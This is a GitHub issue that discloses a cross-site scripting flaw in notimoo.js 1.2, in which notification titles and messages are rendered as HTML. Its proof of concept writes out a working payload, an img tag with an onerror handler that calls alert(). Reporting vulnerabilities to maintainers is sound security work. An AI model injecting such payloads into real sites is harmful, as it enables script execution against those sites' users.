Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS via title, message #3

Open
midist0xf opened this issue Aug 12, 2021 · 0 comments
Open

XSS via title, message #3

midist0xf opened this issue Aug 12, 2021 · 0 comments

Comments

@midist0xf
Copy link

notimoo.js 1.2 has an XSS vulnerability which is executed when a title or message containing Javascript code are set in a notification.

image

POC
Create a notification with a javascript payload:

// Showing a simple notification
  notimooManager.show({
            title: '<img src=x onerror=alert()>',
            message: 'This is a sample notitication showing how easy is to use Notimoo.'
 });

Affected lines:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant